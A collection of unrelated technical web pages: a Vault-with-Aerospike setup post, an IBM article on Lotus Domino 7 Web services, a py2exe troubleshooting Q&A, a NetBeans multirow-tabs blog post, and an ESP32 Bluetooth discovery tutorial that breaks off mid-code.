Vault 1.7.0 is released, and it includes my contribution to support the Aerospike database as backend storage. See the release notes for more details.
From now on, Aerospike users can store their sensitive data using Vault almost seamlessly.
I will not talk about the benefits of using Vault and will jump into the installation and configuration details right away.
Setup
First thing you’ll need is to install Vault if you haven’t done this yet.
Make sure that the Vault binary is available on the PATH. See this page for instructions on setting the PATH on Linux and Mac. This page contains instructions for setting the PATH on Windows.
Verify the installation worked by opening a new terminal session and checking that the vault binary is available.
$ vault version
Vault v1.7.0 (4e222b85c40a810b74400ee3c54449479e32bb9f)
Configuration
Outside of development mode, Vault servers are configured using a file. The format of this file is HCL. Let’s configure our Aerospike cluster to be the Vault’s backend storage:
storage "aerospike" { hostname = "localhost" port = "3300" namespace = "test" set = "vault" } listener "tcp" { address = "127.0.0.1:8200" tls_disable = 1 }
You can find more information about the Aerospike backend configuration here.
To start the server:
vault server -config aerospike_backend.hcl
The Vault server is now up and running on the default port, 8200.
Now open a new terminal window and go through the guide to initialize the Vault server.
It is a little cumbersome, with the unseal keys and the login step, but the guide walks you through it.
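If you have not done this before, the sequence is roughly the following (a sketch; by default init prints five unseal key shares, three of which are needed before you can log in with the initial root token):

$ vault operator init
$ vault operator unseal    # repeat until the key threshold is reached
$ vault login <root-token>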
After the successful login, we need to enable a version 1 kv store:
vault secrets enable -version=1 kv
Usage
Now is the time to try things out.
$ vault kv put kv/my-secret my-value=s3cr3t
Success! Data written to: kv/my-secret

$ vault kv get kv/my-secret
====== Data ======
Key         Value
---         -----
my-value    s3cr3t
Your first secret was successfully stored and retrieved from Aerospike using Vault!
In this short introductory blog post, we covered the setup of Vault using Aerospike as a storage backend.
The Aerospike backend supports both the Community and Enterprise Editions of Aerospike, but it does not yet expose all of the available configuration properties. We will work to include those in future releases.
I hope you are excited about this new Vault capability. Please let us know if you encounter any issues using it.
https://practicaldev-herokuapp-com.global.ssl.fastly.net/aerospike/aerospike-as-a-backend-storage-for-hashicorp-vault-3inf
[Editor's note: This article describes the Lotus Notes/Domino 7 Beta 2 implementation of Web services. It may not accurately reflect the features or functionality of the Gold version of Lotus Notes/Domino 7.].
Lotus Domino maps the WSDL interface to an agent-like Web service design element that can be coded in LotusScript or Java. To be used, the Web service must be on a Domino server with HTTP enabled. (We can test the Web service through an HTTP session in the Notes client preview.) Access is through one of the following Domino URL commands:
- ?OpenWebService invokes the Web service in response to a SOAP-encoded message sent through an HTTP POST. An HTTP GET (for example, a browser query) returns the name of the service and its operations.
- ?WSDL returns the WSDL document in response to an HTTP GET.
This article describes the Web services design element in Lotus Notes/Domino 7 and provides LotusScript and Java examples of the design element. This article assumes that you are an experienced Notes application developer with knowledge of LotusScript or Java.
Let's take a simple example. Given a database name, a view name, and a document number, our operation returns the content of a Subject item. We'll call our operation getNthSubject.
Figure 1. getNthSubject diagram
To make the operation available to the outside world, we publish it in a Web service called GetSubject. GetSubject can contain any number of operations. For example, we might find getFirstSubject and getLastSubject useful. But for now let's just deal with our example operation, getNthSubject. Here's an excerpt from a WSDL document describing a Web service that contains such an operation. Look at it in conjunction with the annotations that follow.
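A minimal fragment along these lines (the message names getNthSubjectRequest and getNthSubjectResponse follow the usual generator convention and are illustrative):

<wsdl:message name="getNthSubjectRequest">                      <!-- (4) -->
  <wsdl:part name="dbname" type="xsd:string"/>                  <!-- (5) -->
  <wsdl:part name="viewname" type="xsd:string"/>
  <wsdl:part name="n" type="xsd:int"/>
</wsdl:message>
<wsdl:message name="getNthSubjectResponse">                     <!-- (4) -->
  <wsdl:part name="getNthSubjectReturn" type="xsd:string"/>     <!-- (6) -->
</wsdl:message>
<wsdl:portType name="GetSubject">                               <!-- (1) -->
  <wsdl:operation name="getNthSubject">                         <!-- (2) -->
    <wsdl:input message="impl:getNthSubjectRequest"/>           <!-- (3) -->
    <wsdl:output message="impl:getNthSubjectResponse"/>         <!-- (3) -->
  </wsdl:operation>
</wsdl:portType>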
Look first at the portType element (1), which defines a set of operations for the service. Our service has just one portType, which has just one operation, getNthSubject (2). The operation has two "messages" (3): one for input and one for output. The messages are defined in message elements (4). We see that the input message has three parts (5): two strings named dbname and viewname and an int named n. The output message has a single part (6) named getNthSubjectReturn which is a string.
So we have one operation with three input parts and one output part, which maps very neatly to a procedure with three read-only parameters and one return value. In LotusScript, such a procedure would be defined by the following function:
Public Function getNthSubject(dbname As String, viewname As String, n As Long) As String
And in Java by the following method:
public String getNthSubject(String dbname, String viewname, int n)
Web service design element
Several approaches are possible for creating a Web service design element in Domino Designer. We can code it entirely in LotusScript or Java. In these cases, saving the design element generates a WSDL document that reflects the LotusScript or Java code. Or we can import an existing WSDL document. In this case, LotusScript or Java is generated that reflects the operations in the imported WSDL. The Web service design element saves the WSDL document as well as the code. If the public interface has not changed, the WSDL document stays as is. If, in our coding, we change anything that affects the public interface, a new WSDL is generated.
In Domino Designer, the Web service design element resides below Agents under Shared code. The Web service design window looks a lot like the agent design window. Click the New Web Service button to create a new Web service. Double-click an existing Web service to edit it.
Figure 2. New Web Service
The Web Services Property box has three tabs just like agents. Here's the Basics tab:
Figure 3. Web Services Property box
A name is required. An alias and comment can be supplied or not. You can elect to be warned if a coding change causes generation of a new WSDL.
The PortType class is the name of the class that defines the procedures that map to the WSDL operations. These procedures must be public functions or subs in LotusScript and public methods in Java. Private functions, subs, and methods are not exposed through the Web services interface. We cannot enter the PortType class in the properties box until we have created the class through coding or importing a WSDL. We will look more closely at the code shortly.
The Security tab is almost exactly the same as the agent Security tab. We will discuss Security in more detail later.
The Advanced tab has additional information for defining the Web service and generating the WSDL. We will discuss this in more detail later.
The editor pane is similar to an agent's. In the right drop-down box, we can select LotusScript or Java. Below a selection of Java is shown. On the left are Objects and Reference panes.
Figure 4. Web service (Java)
Use the Import WSDL button to create a new Web service based on an existing WSDL document. The Show WSDL button compiles any changes to the Web service and displays the WSDL document that defines its public interface. The Export WSDL button compiles any changes to the Web service and exports the WSDL document that defines its public interface. We can also compile by saving or closing the Web service. The WSDL is regenerated only if the public interface changes.
The code for a Web service has the following elements:
- A class definition for the implementation code. This class must become the PortType class named in the Basics tab of the properties box and must be public.
- Within the class, a procedure (function, sub, or method) definition for each operation in the Web service. These procedures must be public. Supporting procedures that we don't want in the interface must be private.
- Inclusion of lsxsd.lss for LotusScript and import of lotus.domino.types.* for Java.
- Initialization of a NotesSession (LotusScript) or Session (Java) object if Domino Objects are accessed. This is best done in a new block for LotusScript or a no-parameter constructor for Java. For Java, we used WebServiceBase.getCurrentSession() to get a Session object. We may also want to get an AgentContext object with Session.getAgentContext(). WebServiceBase is the equivalent of JavaAgent, but the Web service does not have access to the object. The only useful method is the static getCurrentSession().
Here is a template for LotusScript code where the Web service contains one operation. The operation is the example described above with three input parameters and one return value.
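A minimal sketch of that template (the class name GetSubject must match the PortType class entered in the Basics tab):

%INCLUDE "lsxsd.lss"

Public Class GetSubject
    Private session As NotesSession

    Public Sub New()
        ' Initialize the session for Domino Objects access
        Set session = New NotesSession
    End Sub

    Public Function getNthSubject(dbname As String, viewname As String, n As Long) As String
        ' Implementation goes here
        getNthSubject = ""
    End Function
End Class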
And here is a template for Java code where the Web service contains one operation. The constructor must be the default constructor (have no parameters). Other constructors are ignored.
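A corresponding sketch in Java (the implementation class again matches the PortType class; the no-parameter constructor is where the session is obtained):

import lotus.domino.*;
import lotus.domino.types.*;

public class GetSubject {

    private Session session;

    public GetSubject() {
        // WebServiceBase.getCurrentSession() is the hook described above
        session = WebServiceBase.getCurrentSession();
    }

    public String getNthSubject(String dbname, String viewname, int n) {
        // Implementation goes here
        return "";
    }
}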
Now we'll expand the examples to include the working code. Here's the LotusScript:
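A sketch of the working implementation (error handling omitted; GetItemValue returns an array, so we take element 0):

Public Function getNthSubject(dbname As String, viewname As String, n As Long) As String
    Dim db As NotesDatabase
    Dim view As NotesView
    Dim doc As NotesDocument
    Set db = session.GetDatabase("", dbname)
    Set view = db.GetView(viewname)
    Set doc = view.GetNthDocument(n)
    getNthSubject = doc.GetItemValue("Subject")(0)
End Function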
Here's the Java:
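A sketch of the Java equivalent (returning an empty string on failure rather than propagating NotesException):

public String getNthSubject(String dbname, String viewname, int n) {
    try {
        Database db = session.getDatabase("", dbname);
        View view = db.getView(viewname);
        Document doc = view.getNthDocument(n);
        return doc.getItemValueString("Subject");
    } catch (NotesException e) {
        return "";
    }
}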
Invoking and testing Web services
Ultimately, the Web service design element must reside on a Domino 7 server with HTTP running. We can test a Web service design element residing on Domino Designer. We must first select Design - Preview in Web Browser on anything (a form, for example) which starts HTTP. Use 127.0.0.1 for the computer address if the consumer is on the same machine as the Notes client. To act as a consumer of a Web service, we have to send a SOAP message in an HTTP POST request to the URL for the Domino Web service. The URL looks something like this:
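For a Web service named GetSubject in a database mydb.nsf (a placeholder name) previewed locally, an illustrative URL would be:

http://127.0.0.1/mydb.nsf/GetSubject?OpenWebService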
The SOAP message looks something like this:
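An illustrative RPC/encoded request for getNthSubject (the parameter values are placeholders):

<SOAP-ENV:Envelope
    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <SOAP-ENV:Body>
    <getNthSubject SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">  <!-- (1) -->
      <dbname xsi:type="xsd:string">mydb.nsf</dbname>                                   <!-- (2) -->
      <viewname xsi:type="xsd:string">All</viewname>
      <n xsi:type="xsd:int">1</n>
    </getNthSubject>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>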
In this example, the SOAP message (1) identifies the operation and (2) provides values for the input parts. The specific elements appearing in the SOAP-ENV:body are determined by the WSDL binding characteristics, especially the SOAP message format (see "Advanced Properties" below for more detail).
The WebSphere SDK for Web Services provides a tool for invoking Web services and viewing results. This SDK runs under Eclipse, so both must be installed. Note that the WebSphere SDK (as of this writing) does not work with Eclipse 3.0. You can also use WebSphere Studio Application Developer to invoke Web services; the latest version is 5.1.2.
To use the WebSphere SDK tool, open Eclipse and choose Run - Launch the Web Services Explorer. After the Web Services Explorer loads:
- Click the WSDL Page icon. This is the third icon after the right arrow on the right top. A WSDL Main link appears in the Navigator pane on the left.
- Click the WSDL Main link. An Open WSDL box appears in the right pane.
- Enter the URL of the Web service with the ?WSDL command appended, and click Go. We want ?WSDL (not ?OpenWebService) because the Web Services Explorer reads the WSDL document at this point.
- A WSDL Binding Details box appears in the right pane. It contains links to the operations defined by the Web service.
- Click the name of the operation, for example, getNthSubject. An Invoke a WSDL Operation box appears.
- Enter values for the input parts (parameters) and click Go.
The response comes back in the bottom (Status) pane. Here's what Web Services Explorer might look like after invoking the example Web service.
Figure 5. Web Services Explorer
The Actions box has a Source link in the upper right. Clicking Source shows the actual SOAP message. We can modify the SOAP message, and then transmit it by clicking Go. Click Form in the upper right to go back to the original display. The Status box also has a Source link which allows us to see the SOAP response. If the status says there is nothing to display (and a response is expected), the code probably failed.
After running a Web service, check the server console or log.nsf for error messages. We can log or debug by inserting MessageBox statements, which print to the server console or log.nsf. (Do not use Print statements in Beta 2. They go to the HTTP stream as for an agent and corrupt the SOAP response.)
The Advanced tab of the properties box affects the Web service definition as reflected in the WSDL document.
Figure 6. Advanced tab of the Web Services Property box
We can provide what names we want for port type, service element, and service port. For example, we could use GetSubject for all the names. For clarity, we use suffixes that reflect the element type. When we provide names in the properties box, these names are plugged into the generated WSDL document. If we import a WSDL document, the names in the WSDL document are automatically plugged into the properties box.
Below is the complete WSDL document for the GetSubject example. Annotated are the portions reflected in the Advanced tab of the Web Services Property box.
(1) The port type defines a set of operations. The WSDL document contains a name attribute for wsdl:portType which corresponds to the Port type name advanced property.

(2) The service identifies the supported ports. The WSDL document contains a name attribute for wsdl:service which corresponds to the Service element name advanced property. The location attribute of wsdlsoap:address is not correct if the WSDL was obtained through Export WSDL, Show WSDL, or preview in a browser in Domino Designer; it is correct if obtained from the server through the ?WSDL URL command.

(3) A port identifies a binding, which in turn identifies a port type and provides additional information. The WSDL document contains a name attribute for wsdl:port under wsdl:service. Domino allows one service and one port per service.

(4) Two programming models and four SOAP message formats are available. The RPC programming model allows four SOAP message formats: RPC/encoded, RPC/literal, Doc/literal, and Wrapped (the utility of Doc/encoded, the fifth possible format, is not well understood, so it is not supported here). The Message programming model forces the Doc/literal message format, but as a hint only; the actual SOAP message format that gets passed in a Message-based Web service is not published, but rather is by private contract between consumer and provider. The style attribute of wsdlsoap:binding is set as follows:
- wsdlsoap:binding style="rpc" for RPC/encoded and RPC/literal
- wsdlsoap:binding style="document" for Doc/literal and Wrapped
(5) In the input and output elements under wsdl:binding, the use attribute of wsdlsoap:body is set as follows:
- wsdlsoap:body use="encoded" for RPC/encoded. In this case, an encodingStyle attribute is present.
- wsdlsoap:body use="literal" for RPC/literal, Doc/literal, and Wrapped. In these cases, there is no encodingStyle attribute.
(6) For RPC/encoded and RPC/literal, each message part defines the data type by a direct reference to the XMLSchema namespace (for example, type="xsd:string" or type="xsd:int") or a complex type defined in the WSDL "types" section (not shown in this example).
For Doc/literal, each message part refers to a previously defined data element. Below is an excerpt from the sample WSDL with Doc/literal specified. Under wsdl:types, each input part is defined in an element named after the corresponding parameter in the procedure code, and the output part is defined in an element named after the procedure plus "Return."
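A condensed illustration of the pattern (namespace prefixes abbreviated; exact schema attributes may differ):

<wsdl:types>
  <schema xmlns="http://www.w3.org/2001/XMLSchema">
    <element name="dbname" type="xsd:string"/>
    <element name="viewname" type="xsd:string"/>
    <element name="n" type="xsd:int"/>
    <element name="getNthSubjectReturn" type="xsd:string"/>
  </schema>
</wsdl:types>

<wsdl:message name="getNthSubjectRequest">
  <wsdl:part name="dbname" element="impl:dbname"/>
  <wsdl:part name="viewname" element="impl:viewname"/>
  <wsdl:part name="n" element="impl:n"/>
</wsdl:message>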
For Wrapped, each message has one part which refers to a previously defined element of type complexType named for the operation using it and having no attributes. Below is the WSDL excerpt with Wrapped specified.
For an excellent discussion of the SOAP formats, see the developerWorks article, "Which style of WSDL should I use?" by Russell Butek.
(7) soapAction="" if "Include operation name in SOAP action" remains unchecked. If this option is checked, the soapAction specifies the name of the operation, for example:
<wsdlsoap:operation soapAction="getNthSubject"/>
Web services security is similar to security for a server agent invoked from the Web. Below is an example of the Security tab in the Web Services Property box.
Figure 7. Security tab in Web Services Property box
The first two lines determine who is running the Web service, that is, the effective user. If neither line is used, the effective user is the owner of the Web service (the last user who edited or signed the design element).
- If the "Run as Web user" option is selected, the effective user is the user who negotiates network access to the database containing the Web service: Anonymous if the database allows anonymous access or the name supplied to the authentication process.
- If the "Run on behalf of" field is filled in, the effective user is that user.
The consumer of the Web service must be able to negotiate access to the server. Access is automatic if anonymous access is allowed on the HTTP port. Otherwise, the consumer must authenticate with a valid name and Internet password. The database ACL must give the effective user at least Depositor access with Read public documents checked.
"Compile Java code with debugging information" allows connection to a running Web service from a Java debugger such as Eclipse that supports the JPDA (Java Platform Debugger Architecture). Java debugging is new in release 7 and works only on a Notes client. For debugging, then, the Web service must reside on a Notes client. Start an HTTP task on the client by choosing Design - Preview in Web Browser on anything. Invoke the Web service. The Web service should contain debug-only code to pause it for awhile. Then connect the debugger to the running Web service.
For LotusScript Web services, "Allow remote debugging" takes the place of the Java debugging line. Remote debugging for a Web service is the same as for an agent. In this case, the Web service must reside on a server.
"Profile this Web service" allows the collection of elapsed times taken by Domino Objects. To report the results on a selected Web service, choose Design - View Profile Results. Profiling is new in release 7 and works for agents coded in LotusScript and Java as well as Web services.
The "Set runtime security level" box allows three levels of security. The higher-numbered security levels allow potentially damaging operations such as writing to the file system, manipulating environment variables, and so on.
For "Default access to this Web service," we can allow all readers and above, or we can enumerate those who have access.
Web services use the same framework as agents. In the back end, most but not all of agent context applies to Web services. We have already seen how to obtain Session and AgentContext objects in Java and a NotesSession object in LotusScript. Here are the other main contextual elements associated with Web services.
Web service design elements can be locked and unlocked the same as agents.
Here is a LotusScript example that demonstrates getting properties associated with the Web service context. The Web service has three operations.
Below is the Java code.
Operations that use the following model do not require complex data types:
- A single scalar output value (or no output value)
- Scalar input values (or no input values)
Operations returning more than one scalar output value, or taking anything other than scalar input values, require complex data types. The use of complex data types allows the movement of large and varied data structures.
The following sections discuss complex data types:
- Arrays
- Classes
- Inout and output parameters
Arrays
Arrays map to a complexType WSDL element named ArrayOf suffixed by the data type. The WSDL defines the complexType element as an array.
For example, the following operation, implemented as a Java method, returns a String array.
The Java String array maps to a WSDL complexType element named ArrayOf_xsd_string which is defined as an array of type string. The message that defines the return value for the getAll operation (getAllResponse) has one part whose type is ArrayOf_xsd_string.
In LotusScript, we cannot return an array to a Web service consumer. The language rules require that an array return value be defined as a Variant which does not provide enough information to interpret the type when the WSDL is generated. The work-around is to put the array in a class as shown below.
Classes
Classes map to a complexType WSDL element named after the class. Here's a Java example that provides the same data as the Arrays example, but instead of returning an array, we return an object.
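A sketch of that example (the field names in InfoClass are illustrative; what matters for the generated WSDL is that the class exposes three public String members):

public class InfoClass {
    public String dbName;
    public String viewName;
    public String subject;
}

public InfoClass getInfo(String dbname, String viewname, int n) {
    InfoClass info = new InfoClass();
    info.dbName = dbname;
    info.viewName = viewname;
    info.subject = getNthSubject(dbname, viewname, n);  // reuse the earlier operation
    return info;
}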
The Java class InfoClass maps to a complexType of the same name. The complexType has three elements, each of type xsd:string, named after the public data elements in the Java InfoClass class.
Here is the LotusScript equivalent.
Inout and output parameters
Where an output message has one part, whether it be a simple or complex type, the output maps to the return value of a function or method. If an output message has more than one part, the output maps to parameters as well as or instead of a return value. The exact mapping depends on the input parts and how they combine with the output parts. If the first output part does not match any input part and the remaining output parts match the input parts, then the first output part maps to a function or method return value and the remaining parts map to inout parameters.
Otherwise, matching input and output parts map to inout parameters, non-matching input parts map to input parameters, and non-matching output parts map to output parameters. In this case, there is no return value and for LotusScript, subs are used instead of functions.
This WSDL excerpt is a variation of our first example that sends back the input values in the response:
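An illustrative version of the response message in such a WSDL:

<wsdl:message name="getNthSubjectResponse">
  <wsdl:part name="getNthSubjectReturn" type="xsd:string"/>   <!-- (1) -->
  <wsdl:part name="dbname" type="xsd:string"/>                <!-- (2) -->
  <wsdl:part name="viewname" type="xsd:string"/>              <!-- (3) -->
  <wsdl:part name="n" type="xsd:int"/>                        <!-- (4) -->
</wsdl:message>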
(1) One output part does not match an input part -- getNthSubjectReturn. This part maps to a function or method return value. (2)(3)(4) The three remaining output parts -- dbname, viewname, and n -- are the same as the three input parts. These parts map to three inout parameters.
Inout and output parameters cannot be primitive data types. Standard Java provides a package javax.xml.rpc.holders with methods for holding inout and output parameters of various types. Lotus Domino maps inout and output parameters to these classes, which are shown below:
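The standard JAX-RPC holder classes include, among others:

javax.xml.rpc.holders.StringHolder
javax.xml.rpc.holders.IntHolder
javax.xml.rpc.holders.BooleanHolder
javax.xml.rpc.holders.ByteHolder
javax.xml.rpc.holders.ShortHolder
javax.xml.rpc.holders.LongHolder
javax.xml.rpc.holders.FloatHolder
javax.xml.rpc.holders.DoubleHolder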
These classes have a public variable named "value" that the application code can get and set. The following example is a variation of getNthSubject that returns a String as before, but makes the three parameters inout through the use of StringHolder and IntHolder classes. The values of the parameters are passed back to the consumer in the SOAP response.
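A sketch of that variation (the holder's public value field carries the data both in and out):

import javax.xml.rpc.holders.StringHolder;
import javax.xml.rpc.holders.IntHolder;

public String getNthSubject(StringHolder dbname, StringHolder viewname, IntHolder n) {
    try {
        Database db = session.getDatabase("", dbname.value);
        View view = db.getView(viewname.value);
        Document doc = view.getNthDocument(n.value);
        // The current values of dbname, viewname, and n are echoed back in the response
        return doc.getItemValueString("Subject");
    } catch (NotesException e) {
        return "";
    }
}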
For LotusScript, the include file lsxsd.lss defines the following holder classes for inout and output parameters.
These classes have a public variable named "Value" that the application code can get and set. The following LotusScript example is the same as the preceding in Java. The holder classes are used for the three inout parameters.
The primitive data types and their XSD counterparts generally map back and forth. The exception is that an imported SOAPENC data type maps to an object. However, the object maps to an XSD data type on output to a generated WSDL.
(1) Java uses the wrapper classes defined in java.lang: java.lang.Boolean, java.lang.Byte, and so on. LotusScript uses the XSD_ classes defined in lsxsd.lss: XSD_BOOLEAN, XSD_BYTE, and so on. The LotusScript classes inherit the following methods:
Function GetValueAsString() As String
Sub SetValueAsString(value As String)
Note: In an upcoming Beta release, the name SetValueAsString will change to SetValueFromString.
Here is a Java example of an operation returning a java.lang.Boolean type:
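A minimal sketch (the operation name isEven is purely illustrative):

public java.lang.Boolean isEven(int n) {
    return new java.lang.Boolean(n % 2 == 0);
}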
The corresponding operation in LotusScript returns an XSD_BOOLEAN type:
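A corresponding LotusScript sketch, assuming the XSD_BOOLEAN class from lsxsd.lss can be constructed with New and set through the SetValueAsString method shown above:

Public Function isEven(n As Long) As XSD_BOOLEAN
    Dim b As New XSD_BOOLEAN
    If n Mod 2 = 0 Then
        Call b.SetValueAsString("true")
    Else
        Call b.SetValueAsString("false")
    End If
    Set isEven = b
End Function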
(2) LotusScript does not use a primitive for xsd:byte. It always maps to XSD_BYTE (the LotusScript primitive maps to xsd:unsignedByte). (3) LotusScript does not use a primitive for xsd:long. It always maps to XSD_LONG (the LotusScript primitive maps to xsd:int). (4) Java has no primitive for xsd:string. It always maps to java.lang.String.
Other XSD data types map to java.lang, java.math, java.util, and lotus.domino.types (new with Lotus Notes/Domino 7) objects in Java, and XSD_ objects in LotusScript.
(1) A Variant maps to xsd:anyType on output to a generated WSDL. (2) soapenc:base64 maps to byte[] and Byte when imported from a WSDL. A generated WSDL always maps to xsd:base64Binary. (3) soapenc:decimal and soapenc:integer map to XSD:DECIMAL and XSD:INTEGER when imported from a WSDL. A generated WSDL always maps to xsd:decimal and xsd:integer. (4) xsd:unsignedByte maps to Byte when imported from a WSDL. Byte and XSD_UNSIGNEDBYTE both map to xsd:unsignedByte in a generated WSDL.
Domino Web services expose public functions, subs, and methods in the implementation class. Private procedures are hidden. Here is a revision of the GetSubject example that uses public procedures to expose the operations getFirstSubject, getLastSubject, and getNthSubject. Common code is provided through the private procedures openDatabase, openView, and getSubject.
Here is the example in Java.
Lotus Notes/Domino 7 supports the provider side of Web services through agent-like design elements coded in Java or LotusScript. The Web service must reside on a Domino 7 server with HTTP enabled, except that a Web service can be tested and debugged through a Web preview on a Notes client. Consumers access Domino Web services through SOAP-encoded HTTP POST requests.
Web service operations map to public Java methods and public LotusScript functions and subs. Web service data parts map to parameters and return values. Where possible, XSD data types map to Java and LotusScript primitives. Otherwise, complexType elements map to objects.
This article is based on the Beta 2 release of Lotus Notes/Domino 7. Enhancements may be made as development progresses. For example, a future release is expected to support placement of Web service code in script libraries.
- Lotus Domino supports SOAP 1.1 and WSDL 1.1. For specifications and background information, see the following W3C documents:
- Simple Object Access Protocol (SOAP) 1.1
- Web Services Description Language (WSDL) 1.1
- Web Services Architecture
- Web Services Activity
- For more information about SOAP formats, read the developerWorks article, "Which style of WSDL should I use?" by Russell Butek.
- Get involved in the developerWorks community by participating in developerWorks blogs.
Robert Perron is a documentation architect with Lotus in Westford, Massachusetts. He has developed documentation for Lotus Notes and Domino since the early 1990's with a primary concentration on programmability. He developed the documentation for the LotusScript and Java Notes classes and coauthored the book 60 Minute Guide to LotusScript 3 - Programming for Notes 4. He has authored several LDD Today articles. He also authored "A Comprehensive Tour of Programming Enhancements in Notes/Domino 6" for The View.
http://www.ibm.com/developerworks/lotus/library/nd7-webservices/
I'm trying to compile a python project into an executable. To test this, I've got Py2Exe installed, and am trying to do their Hello.py test. Here is hello.py:
print "Hello World!"
Here is my setup.py:
from distutils.core import setup
import py2exe

setup(console=['hello.py'])
I do the following on the command line:
python setup.py py2exe
And I get it mostly working until it starts 'finding dlls needed', at which point we get:
Traceback: <some trace>
ImportError: DLL load failed: %1 is not a valid Win32 application.
Python version is 2.6.6, and I'm on a 32-bit machine running Windows 7. Any ideas or help most appreciated.
In my experience, py2exe is rather difficult to use, a bit hit-and-miss in terms of whether it will work or not, and an absolute nightmare to get working at all with any matplotlib import.

I realise this question is quite old now, but I am not sure why people continue to use py2exe when there are much smoother-functioning alternatives available. I have had good results with pyinstaller (which was recommended to me after asking a question here on SO where I was also battling with py2exe). Every time I have tried it, it "just worked", so if you're still interested in packing up python code into executables then give this app a shot instead.
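For reference, the basic PyInstaller flow for the hello.py above is short:

pip install pyinstaller
pyinstaller --onefile hello.py

The single-file executable then lands in the dist folder.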
Note: py2exe hasn't been updated for some years, while Python and third-party modules have, which must be partly why it often doesn't work particularly well these days.
https://www.codesd.com/item/python-and-py2exe-1-is-not-a-valid-win32-application.html
Programmatically Setting Multirow Tabs on the NetBeans Platform
By Geertjan-Oracle on Aug 07, 2013
The question of the day comes from the development team working on CAVER, which is a tool for the analysis and visualization of tunnels and channels in protein structures.
I would like to keep the tabs and get rid of the "Scroll Documents Left", "Scroll Documents Right" and the "Show Opened Documents list" buttons. Is there a way to do that?
The question was asked today right at the end of the comments on "Farewell to Space Consuming Weird Tabs". The natural assumption is that, to solve the problem above, one would be forced to implement or extend a TabDisplayer or TabDisplayerUI class.
However, as luck would have it, a year or two ago Toni Epple and Stan Aubrecht created and integrated into the NetBeans sources an alternative NetBeans Window System implementation based on the standard Java Swing tab classes. Their implementation allows for the support of multirow tabs, which was a frequently requested feature in NetBeans IDE. An interesting "feature" of this implementation is that it does not have any of the "Scroll Documents Left", "Scroll Documents Right" and the "Show Opened Documents list" buttons.
Below, you see the standard NetBeans Window System, with the buttons that the CAVER team don't want clearly visible, i.e., the 4 buttons to the right of the two tabs:
Now, here is the same application, minus the buttons that we'd like to have removed:
The question is how to get to the above state at startup of the application. Though the user can go to the Options window and specify that multirow tabs should be supported, we'd rather have that set at startup automatically, so that the buttons we don't want are immediately absent.
The solution to this is very simple, but has one down side. Here's all you need to do, i.e., either use the @OnStart annotation or a ModuleInstall class (the latter must be registered in the manifest, which is one reason why @OnStart is nicer):
import org.netbeans.core.windows.options.WinSysPrefs;
import org.openide.modules.OnStart;

@OnStart
public class Installer implements Runnable {

    @Override
    public void run() {
        WinSysPrefs.HANDLER.putBoolean(WinSysPrefs.DOCUMENT_TABS_MULTIROW, true);
        WinSysPrefs.HANDLER.put(WinSysPrefs.DOCUMENT_TABS_PLACEMENT, "3");
    }

}
The second statement above is only needed if you'd like to have the tabs at the bottom of the main window, at startup, rather than where they are by default, at the top.
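As an aside, the "3" corresponds to javax.swing.SwingConstants.BOTTOM, so if you prefer a named constant over the magic number you could presumably write:

WinSysPrefs.HANDLER.put(WinSysPrefs.DOCUMENT_TABS_PLACEMENT, String.valueOf(javax.swing.SwingConstants.BOTTOM));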
The only downside to this solution is the import statement "org.netbeans.core.windows.options.WinSysPrefs". That import statement assumes you have an implementation dependency on the "Core - Windows" module. Ideally, the above settings would be publicly available, rather than private within the module. Since these settings are quite new, it's probably safe that they're internal for the moment, but making them public would avoid the implementation dependency, the only downside to this cool solution.
Agree/disagree with the need for these settings to be public? Vote and share your thought/s here:
Hope it helps, CAVER team!
https://blogs.oracle.com/geertjan/entry/programmatically_setting_multirow_tabs
Introduction
The objective of this tutorial is to explain how to configure the ESP32 to act as a discoverable Bluetooth device and then find it using a Python program.
The ESP32 will be running the Arduino core. On Python, we will be using Pybluez, a module that will allow us to use the Bluetooth functionalities of a computer that supports this protocol.
Note that the use of Pybluez was already covered in this previous tutorial. As mentioned there, you can get the .exe file from the module’s page and install it.
Since the Bluetooth functionalities have just recently arrived to the Arduino core at the time of writing, you may need to get the latest version from the Github page to be able to follow this tutorial.
On the ESP32 side, we will use some lower level IDF functions to start the Bluetooth stacks and to make the device discoverable. This was already covered in detail on this previous tutorial. You can check here the Bluetooth classic API from IDF.
The tests of this ESP32 tutorial were performed using a DFRobot’s ESP-WROOM-32 device integrated in a ESP32 FireBeetle board.
The Python code
We start our Python script by importing the new library we have just installed. Note that even tough the library is called Pybluez, the actual code module we are going to use is called bluetooth.
import bluetooth
To start the discovery, we simply need to call the discover_devices function. In order for the discovery to return the names of the devices, we pass the value True in the lookup_names parameter of the function. Note that this is an optional parameter that defaults to False and without setting it to True we would only get the address of the devices.
Take in consideration that the execution of this function takes a while, in order to scan the nearby devices. By default, the discovery duration is 8 seconds, and we will not change it.
devices = bluetooth.discover_devices(lookup_names=True)
This function call will return a list that we can iterate in a for in loop, in order to print each device’s information. Each element of the list will contain both the Bluetooth address and the device name. Before this loop, we will also print the size of the list, which will correspond to the number of Bluetooth devices found during the discovery procedure.
print("Devices found: %s" % len(devices)) for item in devices: print(item)
The final code can be seen below.
import bluetooth

devices = bluetooth.discover_devices(lookup_names=True)

print("Devices found: %s" % len(devices))

for item in devices:
    print(item)
The Arduino code
We will start our code by including the libraries needed to start the Bluetooth stacks (esp_bt_main.h) and to make the device discoverable (esp_gap_bt_api.h).
Since one of the parameters that will be printed by the Python script is the address of the device, we will also print it in the ESP32 side, for comparison.
For a detailed tutorial on how to print the Bluetooth address of the ESP32, please check this previous post. For that functionality, we will need the esp_bt_device.h library.
#include "esp_bt_main.h" #include "esp_gap_bt_api.h" #include "esp_bt_device.h"
Now that we have all the needed libraries included, we need a function to initialize both the controller and host stacks of Bluetooth. This was also covered in greater detail in this previous tutorial.
This function will receive as input a string with the name of the device, which will be seen by other Bluetooth enabled devices when discovering it. Thus, this name should be later obtained in the Python program.
bool initBluetooth(const char *deviceName) {
    // Initialization code
}
In the implementation of the function, we will first call the btStart function to initialize the Bluetooth controller stack. Then we will call the esp_bluedroid_init and esp_bluedroid_enable functions to both init and enable Bluedroid (the host stack).
We will also perform an error checking on the call of each of the previously mentioned functions, so we are sure everything has initialized correctly.
if (!btStart()) {
    Serial.println("Failed to initialize controller");
    return false;
}

if (esp_bluedroid_init() != ESP_OK) {
    Serial.println("Failed to initialize bluedroid");
    return false;
}

if (esp_bluedroid_enable() != ESP_OK) {
